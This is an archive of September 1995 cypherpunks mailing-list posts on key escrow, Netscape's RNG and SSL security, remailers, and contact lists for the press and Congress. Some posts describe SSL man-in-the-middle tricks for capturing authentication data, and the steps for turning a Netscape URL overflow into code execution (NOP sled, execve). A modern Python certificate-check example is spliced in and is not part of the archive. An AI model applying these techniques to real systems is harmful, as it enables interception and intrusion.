>In fact there is a plague of this kind of thing, law making in the wrong 
>channels, as if the executive agencies in the United States were suddenly 
>able to implement their own law.
>
   Today I attended the Telecommunications Conference here in Blacksburg
sponsored by Rep. Rick Boucher (D-VA), in which an interesting cast of
characters (including Clarence Irving, Asst Secretary of Commerce for
Telecommunication Policy, and presidents and Sr. VPs of Sprint, Time-Warner,
GTE, Bell Atlantic) served as panelists.  One purpose of the conference was
to discuss the upcoming conference committee that will try to reconcile the
House and Senate telco reform bills (which Boucher will likely be on).  After
hearing each of these folks stress the importance of competitiveness,
privacy, and security, during the Q&A session I asked the panel what they
thought about the likelihood of government-mandated key escrow, which the
FBI and others are likely to push.
   Only Boucher stood up to address the question, and he offered a forceful
denunciation of the entire logic of mandated escrow, citing the litany of
reasons against it, including the observation that it was ridiculous from a
competitiveness standpoint, noting that no foreign customers would ever buy
such systems because of the fear that, among others, "the CIA would be
reading their mail."  He hastened to note that although he felt strongly
that in the current congress the calls for mandatory key escrow would go
nowhere, "things could look very different" after the next round of
elections.  The guy from Commerce had nothing to say on the question.

rj
 
------------------------------------------------------------
R. J. Harvey               email:  harveyrj@vt.edu
WWW for job analysis/personality:  http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Tue, 26 Sep 95 06:29:20 PDT
To: khijol!netcom.com!norm@cygnus.com (Norman Hardy)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <ac8ccae902021004990a@DialupEudora>
Message-ID: <199509260036.TAA21140@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Very interesting. I wouldn't be too sure that a transmitted signal at a
> single frequency is the only signal that an opponent could use to bias your
> random numbers. How do you "test for randomness". I think that signal to
> noise arguments, phrased in terms of entropy, can protect you against
> unknown and unwanted signal. (Ironically you want a very low signal to
> noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you
> need n bits and run them thru MD5. Here S is the signal strength of the
> maximum plausible unwanted signal, and N is the noise of the diode.

I tested for randomness by looking at the distribution of random numbers 
over the range I was drawing random numbers from.  If it didn't look 
random, it wasn't ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 26 Sep 95 06:17:02 PDT
To: cypherpunks@toad.com
Subject: getting netscape to support the remailers
Message-ID: <199509260239.TAA14898@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I started thinking about what it would take to get Netscape to
support sending mail through the remailers, after having read the
S/MIME specs which Netscape 2.0 is apparently going to
support. Perhaps with enough browbeating Netscape 3.0 will support the
remailers.

	I think that in order to get netscape to support the remailers
the remailers will have to:

A) Support S/MIME
B) Have a documented protocol, MIME-related

	Did Ray Cromwell do some work towards MIMEifying the
remailers? My impression of his work back when he posted was that it
trusted the remailers too much, but perhaps my memory is flawed-- in
any case his work may be helpful towards developing a remailer
standard, which could then help get support incorporated into
MIME agents.

	I will begin work on a preliminary specification, and post my
results. I figure MIME remailers would allow for:

1) Transparent reply-blocks
	Someone could have a multipart mime message where one of the
parts is Content-Type: reply-block and the MUA would see that and
understand to send replies with that reply block to the remailers.

	I will be posting more as I work out the details. I welcome
comments, suggestions, etc., as I figure that my initial specification
will require much improvement.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Sep 95 06:32:16 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <447bes$7ai@tera.mcom.com>
Message-ID: <Pine.SUN.3.91.950925201850.4260C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff - there are two ways to get the document information right (or wrong).

The first approach is to use redirects to point the client back at the 
original server once you've grabbed whatever info you want for the 
request. Redirects from https -> https don't trigger a warning box. You 
may need to rewrite the URL slightly to prevent loop detection (stick a . 
at the end of the hostname, or add a port, etc.).

The second approach is to only intercept requests for inline images. 
These don't affect the document information window, and give you full 
access to the whole request, which may have user authentication information 
associated with it, in the URL or in header fields. Image requests can be 
identified reliably through simple traffic analysis.

Simon

Contract with America - Explained!			|Phone: +44-81-500-3000
Contract: verb						|Mail: ses@unc.edu
1) To shrink or reduce in size - the economy contracted +-----------------------
2) To become infected -My baby contracted pneumonia when they stopped my welfare





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Tue, 26 Sep 95 06:34:19 PDT
To: pdarnows@rwd.goucher.edu>
Subject: Fax Number List
Message-ID: <Pine.ULT.3.91.950925192929.1630E-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



I promised last week that I would send this out when the idea of a 
blanket-fax-campaign for a c-punks press release was being discussed.  
Sorry it took me so long to get around to it, but here it is.
I was mistaken in my original posting:  it includes neither the Fox Network 
_nor_ the Eye on America show, but I'm sure we'll find those numbers 
somewhere.  

I got it from the Iron Feather Journal, volume 14.  I have no reason to 
believe that any of these numbers are incorrect, but some of them may 
have changed.

Also:  personal apologies to anyone who considers this to be noise.  Please 
restrict all flames to private e-mail.

Anybody wanna fax Ted Turner?  :)

ABC 20/20	    NY			1-212-456-2969
ABC World News      NY			1-212-456-4968
Ann Arbor News	    Ann Arbor, MI	1-313-994-6879
AP		    Los Angeles		1-213-748-1200
AP		    San Diego		1-619-291-2098
AP 		    Washington, D.C.    1-202-828-6422
AP (Broadcast)      Washington, D.C.    1-202-955-7367
Associated Press    Boston, MA		1-617-338-8215
Associated Press    Los Angeles         1-213-748-9836  Steve Loeper
Associated Press    Phoenix, AZ 	1-602-254-9573  Assignment Editor
Associated Press    San Francisco	1-415-552-9430  Bill Schiffmann
Associated Press MN Minneapolis, MN	1-612-332-4245  
Boston Phoenix	    Boston, MA		1-617-536-1463
Boulder Daily Camera Boulder, CO	1-303-442-1508
C-SPAN		    Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS		    NY			1-212-975-1519
CBS		    Washington, D.C.    1-202-659-2586
CBS (Radio)	    Washington, D.C.    1-202-659-5578
CBS Eve News	    NY			1-212-975-2115
CBS Morning	    Washington, D.C.    1-202-331-1765
CBS News	    Los Angeles		1-213-651-0285  Jennifer Siebens
CBS News	    San Francisco	1-415-362-7417  John Blackstone
CBS TV		    Los Angeles		1-213-651-0321  
CBS TV 		    San Francisco	1-415-362-7417
Ch. Sci Monitor     Washington, D.C.    1-202-223-3476
Chicago Sun-Times   Chicago, IL    	1-312-321-3084
Chicago Tribune     Chicago, IL		1-312-222-3143
CNN		    Los Angeles		1-213-460-5081
CNN		    San Francisco       1-415-398-4049
CNN President	    Atlanta, GA		1-404-827-1575  Ted Turner
Coloradoan	    Fort Collins, CO	1-303-224-7726
Denver Post	    Denver, CO		1-303-820-1369
Der Spiegel	    Hollywood, CA	1-213-851-9867  Frances Schoenberg
Detroit News	    Detroit, MI		1-313-222-2335
Gannett	  	    Washington, D.C.	1-202-243-0190
Gannett News Service Sacramento, CA	1-916-446-7326  Becky Lavally
Good Mng America    Washington, D.C.  	1-202-887-7685
Mother Jones	    San Francisco, CA	1-415-863-5136  Douglas Foster
NBC		    Washington, D.C.	1-202-362-2009
NBC (Radio)	    Washington, D.C.	1-703-685-2197
NBC News	    Burbank, CA		1-818-840-4275  Heather Allan
NBC News	    New York, NY	1-212-956-2140
NBC News	    San Francisco, CA	1-415-441-2823  David Burrington
NBC News President  New York, NY	1-212-315-4037  Michael Gartner
NBC TV	  	    Los Angeles		1-818-840-4275
NBC TV 		    San Francisco, CA	1-415-441-2823
Newsweek	    Los Angeles, CA	1-213-444-5287  Managing Editor
Newsweek	    New York, NY	1-212-421-4993  Jonathan Alter
Newsweek	    Washington, D.C. 	1-202-783-6512  
NPR Radio	    San Francisco, CA	1-415-553-2241
NY Times	    New York, NY	1-212-556-4603
PBS		    Alexandria, VA	1-703-739-0775
Pulse! 		    West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition   Washington, D.C. 	1-202-728-1192
Reuters             Los Angeles		1-213-622-0056
Rocky Mountain News Denver, CO		1-303-892-5499
Scripps Howard	    Washington, D.C.	1-202-408-8116
Shareware Magazine  Sunnyvale, CA	1-408-730-2107  Tracy Stephenson
Time	 	    San Francisco, CA	1-415-434-5209  Paul Witteman
Time Magazine	    NY			1-212-522-0451
UPI		    Boston, MA		1-617-338-9774  Barry Fly
UPI		    Los Angeles		1-213-620-1237  
UPI		    San Francisco	1-415-552-3585  Bill Bucy
UPI		    Seattle, WA		1-206-283-0408  Penny Spar
UPI		    Washington, D.C.    1-202-789-2362  
UPI (Radio)	    Washington, D.C.    1-202-842-3625
US News & Wrld Rprt Washington, D.C.    1-202-955-2713
USA Today	    Washington, D.C.	1-202-276-5527
Utne Reader	    Minneapolis, MN	1-612-338-6043
Whole Earth Review  Sausalito, CA	1-415-332-2416  Kevin Kelly


kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Sep 95 06:24:38 PDT
To: cypherpunks@toad.com
Subject: Re: Net KiddiePorn Hype on TV
In-Reply-To: <v01510106ac8c839e406c@[164.110.102.112]>
Message-ID: <9cg1BD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jkandt@mail.wsdot.wa.gov (Jeff Kandt) writes:
> I heard that piece too.  Sounded like a total PR move for Curtis
> Slewah(sp?) and his Guardian Angels.  They certainly didn't sound like they
> knew what they were doing, technically speaking.

Curtis Sliwa is rather notorious in NYC politics. He used to have a talk
show with his wife Lisa in WABC; not sure what happened to it after they
got divorced. He admitted staging a physical attack on himself to increase
his popularity; after the attack he claimed the cops did it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 25 Sep 95 13:47:57 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <9509252047.AA01994@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



It's not an exploit script, but you can find an auto crash "animation"
for Ray's discovered bug on 
  http://hplyot.obspm.fr/~dl/netscapesec/c1.html
(or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
Btw, from my tests, looks like the SunOs version is not crashing after
356 bytes like my first HPUX/Solaris test but needs a slightly longer
url, if folks can try out the above urls and confirm/infirm crash for
other platforms, thx !


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

assassination North Korea terrorist SEAL Team 6 radar supercomputer
PLO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 06:21:38 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Decompiling Netscape
In-Reply-To: <v02120d02ac8cdee21178@[199.2.22.120]>
Message-ID: <199509260153.VAA11436@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Doug,
  I've managed to find a URL which can place an arbitrary value in
the PC register without disassembly. What I did was make  a URL

abcdefg....ABCDEFG....ZAaBbCcDd.....ZzAAaaBBbbCCcc.....ZZzz


then, when Netscape coredumped and the PC gets modified, I look
at the PC, say 0x54535251 and see that it is QRST, so I place
the PC register there.  Now all I need is some 386 code under
BSDI2.0 to do an execve.

I just wrote a simple execve in C, compiled it, and stole the appropriate
magic kernel library invocation sequence. What I need to do now is 
1) find out the approximate address of the stack pointer,
2) generate some code that has a whole lotta NOPs, followed by the
execve sequence, and finally, preface all that by a PC value that
will hopefully land somewhere inside that field of NOPs on the stack.
And all this has to be done without using any characters which will
stop netscape from reading in more pieces of the domain string.

You might be able to use the same techniques to whip up a quick exploit
on your systems. By far, the best exploits will be on the Mac and
Windows (especially), because those make up the majority of people
using Netscape. Create an exploit on Windows, and stun the world.  ;-)


-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 15:13:06 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <199509251256.IAA27310@gatekeeper.itribe.net>
Message-ID: <4479g1$7ai@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251256.IAA27310@gatekeeper.itribe.net>, bianco@itribe.net (David J. Bianco) writes:
> On Sep 25,  2:38, Phil Karlton sent the following to the NSA's mail
> archives:
> > Subject: Netscape "random" number seed generator code available
> || As is mentioned in the README, more will need to be done to find more
> || bits of entropy. (Too much of a good thing is still not enough.)
> || However the security team believes that the RNG seed is no longer the
> || weak link and candidate for attack.  So I am personally volunteering
> || to have my head shaved if a discovered deficiency in this code results
> || in an easily attacked generated seed. [You will be expected to show
> || your work. :-)]
> ||
> 
> Will you put a picture up on http://www.netscape.com/ if someone does find
> a problem? 8-)

  I will make sure that a picture is available on the web if Phil has
to shave his head.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 26 Sep 95 06:22:50 PDT
To: cypherpunks@toad.com
Subject: Re: List of US representitives
Message-ID: <9509260213.AA29843@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:37 PM 9/25/95 EST, Brian Gorka wrote:
>Someone posted a list of US reps awhile back...  Can someone forward me a
>copy? 
>Thanks.

Brian,

  Here's the list you requested.  Linda Thompson (lindat@iquest.net) posted
this in August, 1995.

Regards -
  Lynne

                                ++++++++++

senator@boxer.senate.gov
senator_brown@brown.senate.gov,
sen_dodd@dodd.senate.gov,
senator_lieberman@lieberman.senate.gov,
joe_biden@biden.senate.gov,
senator_coverdell@coverdell.senate.gov,
tom_harkin@harkin.senate.gov,
chuck_grassley@grassley.senate.gov,
larry_craig@craig.senate.gov,
dirk_kempthorne@kempthorne.senate.gov,
senator@simon.senate.gov,
senator@moseley-braun.senate.gov,
wendell_ford@ford.senate.gov,
senator@breaux.senate.gov,
senator@johnston.senate.gov,
senator@kennedy.senate.gov,
john_kerry@kerry.senate.gov,
senator@mikulski.senate.gov,
senator@levin.senate.gov,
mail_grams@grams.senate.gov,
senator@wellstone.senate.gov,
john_ashcroft@ashcroft.senate.gov,
max@baucus.senate.gov,
conrad_burns@burns.senate.gov,
bob@kerrey.senate.gov,
mailbox@gregg.senate.gov,
opinion@smith.senate.gov,
senator@bradley.senate.gov,
senator_Bingaman@bingaman.senate.gov,
senator_domenici@domenici.senate.gov,
senator_reid@reid.senate.gov,
senator_dewine@dewine.senate.gov,
nickles@rpc.senate.gov,
lugar@iquest.net
senator_chafee@chafee.senate.gov,
senator@hollings.senate.gov,
tom_daschle@daschle.senate.gov,
larry_pressler@pressler.senate.gov,
senator_frist@frist.senate.gov,
senator@hutchison.senate.gov,
senator_robb@robb.senate.gov,
senator@warner.senate.gov,
senator_leahy@leahy.senate.gov,
vermont@jeffords.senate.gov,
senator_Gorton@gorton.senate.gov,
russell_feingold@feingold.senate.gov,
senator@rockefeller.senate.gov,
everett@hr.house.gov,
budmail@hr.house.gov,
sbachus@hr.house.gov,
jdickey@hr.house.gov,
edpastor@hr.house.gov,
dcaucus@hr.house.gov,
woolsey@hr.house.gov,
gmiller@hr.house.gov,
sfnancy@hr.house.gov,
talk2tom@hr.house.gov,
petemail@hr.house.gov,
annagram@hr.house.gov,
tellnorm@hr.house.gov,
zoegram@hr.house.gov,
samfarr@hr.house.gov,
george@hr.house.gov,
andrea22@hr.house.gov,
tellbuck@hr.house.gov,
jharman@hr.house.gov,
tucker96@hr.house.gov,
housesst@hr.house.gov,
rpackard@hr.house.gov,
skaggs@hr.house.gov,
schaefer@hr.house.gov,
bozrah@hr.house.gov,
cshays@hr.house.gov,
delaware@hr.house.gov,
kthurman@hr.house.gov,
cstearns@hr.house.gov,
canady@hr.house.gov,
pdeutsch@hr.house.gov,
hastings@hr.house.gov,
jlinder@hr.house.gov,
georgia6@hr.house.gov,
saxby@hr.house.gov,
ga10@hr.house.gov,
runderwo@hr.house.gov,
brush@hr.house.gov,
luisg@hr.house.gov,
hfawell@hr.house.gov,
dhastert@hr.house.gov,
durbin@hr.house.gov,
johnhost@hr.house.gov,
emailpat@hr.house.gov,
edky01@hr.house.gov,
mward2@hr.house.gov,
bunning4@hr.house.gov,
torkma06@hr.house.gov,
jmoakley@hr.house.gov,
cardin@hr.house.gov,
tellhoek@hr.house.gov,
congehlr@hr.house.gov,
davecamp@hr.house.gov,
repsmith@hr.house.gov,
chrysler@hr.house.gov,
lrivers@hr.house.gov,
jconyers@hr.house.gov,
gil@hr.house.gov,
dminge@hr.house.gov,
mn03@hr.house.gov,
vento@hr.house.gov, 
tellbill@hr.house.gov,
tocollin@hr.house.gov,
oberstar@hr.house.gov,
goldsmit@iquest.net
talentmo@hr.house.gov,
demldr@hr.house.gov,
bemerson@hr.house.gov,
bthompson@hr.house.gov,
funnc02@hr.house.gov,
thechief@hr.house.gov,
mail2nc5@hr.house.gov,
crose@hr.house.gov,
myrick@hr.house.gov,
chtaylor@hr.house.gov,
melmail@hr.house.gov,
epomeroy@hr.house.gov,
zeliff@hr.house.gov,
franksnj@hr.house.gov, 
dzimmer@hr.house.gov,
mpforbes@hr.house.gov,
lazio@hr.house.gov,
tmanton@hr.house.gov,
molinari@hr.house.gov,
rangel@hr.house.gov,
jserrano@hr.house.gov,
engeline@hr.house.gov,
boehlert@hr.house.gov,
bpaxon@hr.house.gov,
portmail@hr.house.gov,
hokemail@hr.house.gov,
istook@hr.house.gov,
furseor1@hr.house.gov,
pdefazio@hr.house.gov,
murtha@hr.house.gov,
jonfox@hr.house.gov,
mchale@hr.house.gov,
pa16@hr.house.gov,
jspratt@hr.house.gov,
cwilson@hr.house.gov,
samtx03@hr.house.gov,
barton06@hr.house.gov,
doggett@hr.house.gov,
frost@hr.house.gov,
ggreen@hr.house.gov,
enidutah@hr.house.gov,
ortonut3@hr.house.gov,
opickett@hr.house.gov,
talk2bob@hr.house.gov,
ninthnet@hr.house.gov,
bsanders@igc.apc.org,
repwhite@hr.house.gov,
asklinda@hr.house.gov,
dunnwa08@hr.house.gov,
rtate@hr.house.gov,
mneumann@hr.house.gov,
badger02@hr.house.gov,
roth08@hr.house.gov,
commerce@hr.house.gov,
slabmgnt@hr.house.gov,
resource@hr.house.gov,
housesst@hr.house.gov,
smbizcom@hr.house.gov

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGdiOj5A4+Z4Wnt9AQH5dwP+ItAzI/4EpqKaO34oKpOyI2QFcX8o5IYf
vqAWC9u4D/cEuWx8hmVIe+r5iFmgbx3jIW2fPtzeu9G8VnPu5YrefzQGVR1UQsNz
ockVde+WJb96M+To8u2141zMkHSr3ZurHjWk+K6Ft4c1ek0eRkYchUwEnvfigwZb
DQCDjR+mb84=
=az85
-----END PGP SIGNATURE-----

********************************************************************
Lynne L. Harrison, Esq.
34 Cannon Street
Poughkeepsie, New York  12601
(914) 454-8130
E-Mail: lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 15:46:44 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net>
Message-ID: <447bes$7ai@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SOL.3.91.950925124443.359B-100000@chivalry>, ses@tipper.oit.unc.edu (Simon Spero) writes:
> Exactly - the trust model used in Navigator 1.1N requires you to trust 
> every single owner of a valid certificate. Getting hold of any key is 
> vastly easier than having to obtain a specific key; in the worst case, 
> you just buy your own - SSL exchanges are repudiable, and a few simple 
> tricks can make sure your certificate doesn't show up in the "Document 
> Information" dialog box.

  Can you explain to me how you would get the Navigator to accept your
certificate, but not display anything in the "Document Information"
dialog?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
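
The trust decision described in the text quoted above, modelled as an added example (not part of any post and not Netscape's code). The names Cert, ca_issue, accept_chain_only and accept_host_bound are hypothetical, an HMAC stands in for the CA's signature, and the host names are constructed. normalize_host covers the trailing-dot and added-port spellings mentioned elsewhere in this thread.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Constructed stand-in for a CA signing key; a real CA uses a public-key signature.
CA_KEY = b"constructed-demo-ca-key"


@dataclass(frozen=True)
class Cert:
    subject_host: str   # the site name the CA vouched for
    public_key: bytes   # opaque placeholder for the holder's key
    signature: bytes    # CA signature over the two fields above


def _signed_bytes(subject_host: str, public_key: bytes) -> bytes:
    return subject_host.encode("ascii") + b"\x00" + public_key


def ca_issue(subject_host: str, public_key: bytes) -> Cert:
    """The CA signs whatever (host, key) pair a paying customer presents."""
    sig = hmac.new(CA_KEY, _signed_bytes(subject_host, public_key),
                   hashlib.sha256).digest()
    return Cert(subject_host, public_key, sig)


def chain_valid(cert: Cert) -> bool:
    """True when the CA signature over the certificate fields verifies."""
    expected = hmac.new(CA_KEY, _signed_bytes(cert.subject_host, cert.public_key),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, cert.signature)


def normalize_host(host: str) -> str:
    """Canonical form for comparison: lower case, no port, no trailing dot.
    IPv6 literals are out of scope for this sketch."""
    host = host.strip().lower()
    name, sep, port = host.rpartition(":")
    if sep and port.isdigit():
        host = name
    return host[:-1] if host.endswith(".") else host


def accept_chain_only(cert: Cert, requested_host: str) -> bool:
    """Trust model as described in the post: any validly signed certificate
    is accepted, whatever site the user asked for."""
    return chain_valid(cert)


def accept_host_bound(cert: Cert, requested_host: str) -> bool:
    """Corrected check: the certificate must also name the requested site."""
    return (chain_valid(cert)
            and normalize_host(cert.subject_host) == normalize_host(requested_host))


def constructed_certs() -> dict:
    """Constructed sample certificates for the demonstration."""
    legit = ca_issue("shop.example", b"key-of-shop")
    other = ca_issue("other.example", b"key-of-other")
    # Relabelled certificate: claims shop.example but reuses other's signature.
    relabelled = Cert("shop.example", other.public_key, other.signature)
    return {"legit": legit, "other": other, "relabelled": relabelled}


if __name__ == "__main__":
    certs = constructed_certs()
    for name, cert in certs.items():
        print(name,
              "chain-only:", accept_chain_only(cert, "shop.example"),
              "host-bound:", accept_host_bound(cert, "shop.example"))
```
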




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:16:16 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
Message-ID: <199509260246.WAA20098@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950925144659.21198A-100000@nic.cerf.net>,
paulp@CERF.NET (Paul Phillips) wrote:

>On Mon, 25 Sep 1995, John Young wrote:
[...]
>>    If the head of the F.B.I. acknowledged that his agency was
>>    powerless to crack a cryptography program like Pretty Good
>>    Privacy, the stampede for that software on the Internet
>>    would make the run on Windows 95 look puny.
>
>That's a bizarre and naive statement.  Is there anyone that thinks the 
>spread of strong crypto has been less than rapid only because people are 
>afraid it won't protect them against the government? Um, sorry, no.

The general public doesn't use PGP. If the FBI director admitted that
using PGP is safe even against the FBI, the general public just might
become aware of it. Perhaps the statement isn't so naive after all.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGdpbioZzwIn1bdtAQG5zwGAmmSuPLdrDV9rBAUmJFuywUC4x1KgeVqP
HiD9C8pP+L5xkZw8pyH8xhwfKPZeKOHb
=w1IS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:10:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
Message-ID: <199509260259.WAA20138@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509251159.EAA08528@mycroft.rand.org>, jim@acm.org (Jim
Gillogly) wrote:


>I'm nervous enough about all the Easter Eggs that have been reported in
>Netscape, like the secret keystroke shortcut to get to Fishcam, or the
>different behavior it exhibits when it finds a certain obscurely-named
>directory at the top level. 

Would you please elaborate?

TIA,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGdsfSoZzwIn1bdtAQG3ZwGAk5ZFceYsUmo9OgQJ9oVZGcNcXnorr9a2
cLP/xy3vB/COr3uKjfr0mcYY6JMMLxfa
=nXHi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:11:23 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
Message-ID: <199509260306.XAA20157@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509251617.ZM167@tofuhut>, jsw@netscape.com ("Jeff Weinstein")
wrote:

>--
>--PART-BOUNDARY=.19509251617.ZM167.tofuhut
>Content-Type: text/plain; charset=us-ascii
>
>  Here is the press release we put out this morning regarding the fix
>for RNG seed and stack overflow problems.

Do the new versions use PGP's randseed.bin? If Netscape even only looks at
data used to keep PGP secure,  Netscape will be banned from my computer
and every computer I am responsible for. -- For good.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGduUCoZzwIn1bdtAQFEgwGA3265JY1cahyqqd2VEe+1RPXI96DQBPRV
r1EWdjxzjgXvxplLMagh9yWOPBq9OKRX
=F3qb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Tue, 26 Sep 95 06:00:33 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Please send me SSL problems...
Message-ID: <v0213050fac8d26c8eab1@[157.22.240.12]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:04 AM 9/20/95, Jeff Weinstein wrote:
>  I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products.  I'm particularly interested in bugs in our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
>  We have been collecting comments on SSL 3.0, and have started incorporating
>that feedback into our spec.  Please don't assume that our lack of response
>means that we are ignoring your comments.  Between Navigator 2.0 and
>things like the SSL challenge and the RNG fire drill, we just have not had
>the time to get a new rev of the spec out.  Hopefully soon...

As you may know, Jonathan, who is an active member of this list, has already
written about Consensus' intention to continue to upgrade RSAREF. We'd like
to help make sure that RSAREF stays in sync with SSLREF as we upgrade it.
For instance, the next major release of RSAREF will be encrypting the
private key (which now has to be done outside of RSAREF.)

One area in particular we could use some feedback on from you:

Currently SSLREF makes 4 calls that are not in the published program
interface of RSAREF. These calls are DES_CBCInit, DES_CBCUpdate,
RSAPublicEncrypt, RSAPrivateEncrypt. With your license with RSA for RSAREF
you are allowed to go under the published interface by using the DES
